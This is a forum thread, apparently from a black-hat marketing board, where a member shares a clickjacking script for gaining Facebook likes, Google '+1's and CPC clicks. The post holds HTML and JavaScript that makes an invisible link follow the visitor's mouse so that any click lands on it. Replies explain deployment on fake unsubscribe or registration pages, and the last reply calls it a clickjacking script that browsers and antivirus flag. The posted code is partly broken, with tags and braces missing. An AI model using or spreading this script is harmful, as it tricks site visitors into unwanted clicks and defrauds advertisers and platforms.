[get] free script for fb likes, CPC actions and much more


May 13, 2011
Reaction score
Hi! It is my first post on this forum, I would like to share with U a very clever simple script.

Collect fb "likes" tweets, google "+" never be easly!
ofcourse U can use that for improve your CPC or smth.

There is:

<body style="background: url("images/bg_body.gif") repeat-x scroll 0% 0% rgb(49, 92, 131);">


<div style="width: 942px; margin-top: 1em; padding-top: 1em; padding-bottom: 1em; background-color: white;">

<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; opacity: 0; top: 286px; left: 509px;" id="icontainer">

<a href="hXXp://yourBHWaffilateCPCorFBlikeSCRIPTlink.html"><img src="fakebackground.png" alt="sdf" title="sdf" /></a>



    var iflag = 0;

    var icontainer = document.getElementById('icontainer');    

    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body    




    function mouseFollower(e){

    if (window.event)


        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';

        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';




        icontainer.style.top = (e.pageY-5)+'px';

        icontainer.style.left = (e.pageX-5)+'px';



    document.onmousemove = function(e) {

        if (iflag == 0) {mouseFollower(e);}



Ps. That script will works with adsense too, but i higly dont recommend that!

Give me reputation + if that script help U. Thx
in body section ofc :) for examlpe in Your post/page temptate.

For try just save as .html
That is full script .
Dont be leazy. For try just copy to your html editor and save :) (and updale your bhw-link in line 12)
i save it! as you say but showing following error!

"Firefox doesn't know how to open this address, because the protocol (hxxp) isn't associated with any program. "
is it working properly or i dont get it or it does not works
That is pretty funny....but just to help you out replace the "xx's" with "tt's"

final result will be http

does this look familiar?

some people can not post links so they have to write the link as such
i save it! as you say but showing following error!

"Firefox doesn't know how to open this address, because the protocol (hxxp) isn't associated with any program. "

hey backlinkmaster, this script works on client-side. To test You dont need server.
Just copy and save in html - htxxp in line 12 replace your own link and save. And ofc open in your browser :D

ugly demo: redroseagency.yoyo.pl

This script have multiple applications, fb, CPA, G+ thats only proposition.
I really cant teach You thinkin. Sorry.
Sorry but still now confusing.Will i replace my targated facebook fan page link to line 12 and then save as .html? if yes .. i have already done that but then what?how will it increase the likes?
Sorry but still now confusing.Will i replace my targated facebook fan page link to line 12 and then save as .html? if yes .. i have already done that but then what?how will it increase the likes?

eh, just use your brain!

for example:
create step2 register page on your blog/ forum or
create fake unsubscribe page for your mailing or
use script on your promotion/cuppon page

Sorry for being a noob, but can someone help explain how this coding works as well? Do you input your facebook url on the (http) line and then whenever someone visits this page it will automatically click like?
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hxxp problem :)

This script is a clickjacking script, it has been shared dozens of times, usually by new members.

It will NOT work well for FB, you will get a confirm button very quickly with this and also a lot of new browsers, AV or firewalls will detect this and set off a warning.